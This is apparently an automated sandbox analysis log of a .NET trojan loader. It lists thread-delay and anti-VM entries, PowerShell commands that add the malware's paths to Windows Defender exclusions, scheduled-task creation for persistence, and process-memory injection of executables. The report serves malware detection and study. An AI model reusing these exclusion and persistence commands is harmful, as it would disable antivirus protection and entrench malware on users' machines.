                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -237656s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -237546s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -237436s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -237328s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -237218s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -237088s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -236968s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -236817s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -236568s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -236453s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -236302s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -236186s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -236065s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -235943s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -235812s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 2744 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 416 Thread sleep count: 9086 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5480 Thread sleep count: 353 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4884 Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6324 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7092 Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5228 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 2524 Thread sleep time: -16602069666338586s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -14757395258967632s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -240000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -239828s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -239715s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -239609s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -239500s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -239391s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -239264s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -239156s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -239047s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -238937s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -238828s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -238719s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -238609s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -238500s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -238391s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -238025s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -237907s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -237782s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -237657s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -237532s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -237407s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -237295s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -237188s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -237063s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -236938s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -236766s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -236579s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -236438s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344 Thread sleep time: -236313s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 3420 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 5972 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 240000
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 239874
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 239764
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 239654
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 239546
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 239437
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 239328
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 239218
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 239080
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 238968
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 238859
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 238750
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 238640
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 238531
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 238421
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 238312
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 238203
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 238093
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 237984
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 237875
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 237765
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 237656
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 237546
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 237436
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 237328
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 237218
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 237088
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 236968
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 236817
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 236568
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 236453
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 236302
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 236186
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 236065
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 235943
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 235812
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 240000
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 239828
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 239715Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 239609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 239500Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 239391Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 239264Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 239156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 239047Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 238937Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 238828Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 238719Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 238609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 238500Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 238391Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 238025Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 237907Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 237782Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 237657Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 237532Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 237407Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 237295Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 237188Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 237063Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 236938Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 236766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 236579Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 236438Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 236313Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 922337203685477
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000009.00000002.4641371042.0000000006AC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAO,
                    Source: xNgpESfQOvfb.exe, 0000000A.00000002.2267710024.00000000078EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _NECVMWar&Prod_VMware_SA
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Memory written: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | Memory written: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmpA395.tmp"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe"
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmp9832.tmp"
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | Process created: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | Process created: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
